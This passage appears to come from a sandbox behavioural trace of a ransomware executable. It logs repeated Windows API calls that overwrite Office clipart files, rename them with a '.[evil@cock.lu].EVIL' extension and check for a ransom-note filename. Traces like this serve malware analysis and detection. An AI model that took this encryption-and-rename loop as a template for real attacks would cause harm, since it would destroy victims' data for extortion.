Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01357_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.366] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6bf6, lpOverlapped=0x0) returned 1 [0159.376] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.376] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.376] _errno () returned 0x84b1160840 [0159.376] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.376] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x6c00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6c00, lpOverlapped=0x0) returned 1 [0159.376] CloseHandle (hObject=0x1a8) returned 1 [0159.376] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.376] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.377] __uncaught_exception () returned 0x84b1160800 [0159.377] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.377] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01357_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01357_.wmf.[evil@cock.lu].evil")) returned 1 [0159.378] ??_V@YAXPEAX@Z () returned 0x1 [0159.382] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF", dwFileAttributes=0x200) returned 0 [0159.382] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.382] wcsstr (_Str="NA01358_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.382] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF") returned 69 [0159.382] wcscmp (_String1="NA01358_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.382] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01358_.WMF") returned 0x0 [0159.382] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF") returned 0x45 [0159.382] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01358_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.385] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd6e, lpOverlapped=0x0) returned 1 [0159.808] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.808] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.808] _errno () returned 0x84b1160840 [0159.808] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.809] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd80, lpOverlapped=0x0) returned 1 [0159.809] CloseHandle (hObject=0x1a8) returned 1 [0159.809] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.809] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.809] __uncaught_exception () returned 0x84b1160800 [0159.809] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.810] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01358_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01358_.wmf.[evil@cock.lu].evil")) returned 1 [0159.811] ??_V@YAXPEAX@Z () returned 0x1 [0159.815] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01358_.WMF", dwFileAttributes=0x200) returned 0 [0159.815] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.815] wcsstr (_Str="NA01361_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.815] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF") returned 69 [0159.815] wcscmp (_String1="NA01361_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.815] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01361_.WMF") returned 0x0 [0159.815] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF") returned 0x45 [0159.815] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01361_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.818] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b74, lpOverlapped=0x0) returned 1 [0159.831] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.831] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.831] _errno () returned 0x84b1160840 [0159.831] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.831] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b80, lpOverlapped=0x0) returned 1 [0159.831] CloseHandle (hObject=0x1a8) returned 1 [0159.831] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.832] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.832] __uncaught_exception () returned 0x84b1160800 [0159.832] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.832] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01361_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01361_.wmf.[evil@cock.lu].evil")) returned 1 [0159.833] ??_V@YAXPEAX@Z () returned 0x1 [0159.836] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01361_.WMF", dwFileAttributes=0x200) returned 0 [0159.836] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.836] wcsstr (_Str="NA01368_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.836] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF") returned 69 [0159.836] wcscmp (_String1="NA01368_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.836] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01368_.WMF") returned 0x0 [0159.836] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF") returned 0x45 [0159.836] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01368_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.838] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x40412, lpOverlapped=0x0) returned 1 [0159.875] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.875] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.875] _errno () returned 0x84b1160840 [0159.875] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.875] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x40420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x40420, lpOverlapped=0x0) returned 1 [0159.876] CloseHandle (hObject=0x1a8) returned 1 [0159.876] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.876] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.876] __uncaught_exception () returned 0x84b1160800 [0159.876] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.876] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01368_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01368_.wmf.[evil@cock.lu].evil")) returned 1 [0159.877] ??_V@YAXPEAX@Z () returned 0x1 [0159.880] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF", dwFileAttributes=0x200) returned 0 [0159.880] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.881] wcsstr (_Str="NA01421_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.881] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF") returned 69 [0159.881] wcscmp (_String1="NA01421_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.881] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01421_.WMF") returned 0x0 [0159.881] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF") returned 0x45 [0159.881] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01421_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.883] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2b16e, lpOverlapped=0x0) returned 1 [0159.930] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.930] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.931] _errno () returned 0x84b1160840 [0159.931] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.931] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2b180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2b180, lpOverlapped=0x0) returned 1 [0159.931] CloseHandle (hObject=0x1a8) returned 1 [0159.931] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.932] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.932] __uncaught_exception () returned 0x84b1160800 [0159.932] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.932] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01421_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01421_.wmf.[evil@cock.lu].evil")) returned 1 [0159.933] ??_V@YAXPEAX@Z () returned 0x1 [0159.936] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF", dwFileAttributes=0x200) returned 0 [0159.936] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.936] wcsstr (_Str="NA01468_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.937] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF") returned 69 [0159.937] wcscmp (_String1="NA01468_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.937] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01468_.WMF") returned 0x0 [0159.937] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF") returned 0x45 [0159.937] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01468_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.939] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4e82, lpOverlapped=0x0) returned 1 [0159.968] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.968] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.968] _errno () returned 0x84b1160840 [0159.968] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.968] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x4ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ea0, lpOverlapped=0x0) returned 1 [0159.968] CloseHandle (hObject=0x1a8) returned 1 [0159.968] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.969] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.969] __uncaught_exception () returned 0x84b1160800 [0159.969] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.970] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01468_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01468_.wmf.[evil@cock.lu].evil")) returned 1 [0159.971] ??_V@YAXPEAX@Z () returned 0x1 [0159.976] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF", dwFileAttributes=0x200) returned 0 [0159.976] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.976] wcsstr (_Str="NA01470_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.976] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF") returned 69 [0159.976] wcscmp (_String1="NA01470_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.976] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01470_.WMF") returned 0x0 [0159.976] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF") returned 0x45 [0159.976] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01470_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.979] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4ada, lpOverlapped=0x0) returned 1 [0160.022] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.022] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.022] _errno () returned 0x84b1160840 [0160.022] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.022] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ae0, lpOverlapped=0x0) returned 1 [0160.022] CloseHandle (hObject=0x1a8) returned 1 [0160.022] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.023] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.023] __uncaught_exception () returned 0x84b1160800 [0160.023] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.023] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01470_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01470_.wmf.[evil@cock.lu].evil")) returned 1 [0160.024] ??_V@YAXPEAX@Z () returned 0x1 [0160.028] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF", dwFileAttributes=0x200) returned 0 [0160.028] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.028] wcsstr (_Str="NA01472_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.028] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF") returned 69 [0160.028] wcscmp (_String1="NA01472_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.028] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01472_.WMF") returned 0x0 [0160.028] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF") returned 0x45 [0160.028] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01472_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.031] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2028, lpOverlapped=0x0) returned 1 [0160.050] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.050] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.050] _errno () returned 0x84b1160840 [0160.051] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.051] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2040, lpOverlapped=0x0) returned 1 [0160.051] CloseHandle (hObject=0x1a8) returned 1 [0160.051] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.051] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.051] __uncaught_exception () returned 0x84b1160800 [0160.051] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.052] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01472_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01472_.wmf.[evil@cock.lu].evil")) returned 1 [0160.053] ??_V@YAXPEAX@Z () returned 0x1 [0160.057] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF", dwFileAttributes=0x200) returned 0 [0160.057] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.057] wcsstr (_Str="NA01473_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.057] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF") returned 69 [0160.057] wcscmp (_String1="NA01473_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.057] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01473_.WMF") returned 0x0 [0160.057] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF") returned 0x45 [0160.057] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01473_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.060] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, 